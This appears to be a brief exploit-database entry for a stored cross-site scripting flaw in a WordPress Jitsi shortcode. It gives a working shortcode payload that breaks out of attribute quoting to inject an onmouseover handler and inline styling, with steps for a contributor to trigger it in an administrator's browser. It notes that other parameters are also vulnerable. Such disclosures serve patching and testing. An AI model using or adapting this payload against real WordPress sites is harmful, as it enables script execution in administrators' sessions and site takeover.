Share
## https://sploitus.com/exploit?id=WPEX-ID:A9F47D11-47AC-4998-A82A-DC2F3B0DECDF
As a contributor, add a shortcode:

```
[jitsi width="700px" height=700px" username='test" onmouseover="alert(1);"' useremail='" style="background-color: pink; height: 500px;"']
```

View the post as an admin and move your mouse over the pink box to trigger the XSS.

Note: Other parameters are also vulnerable.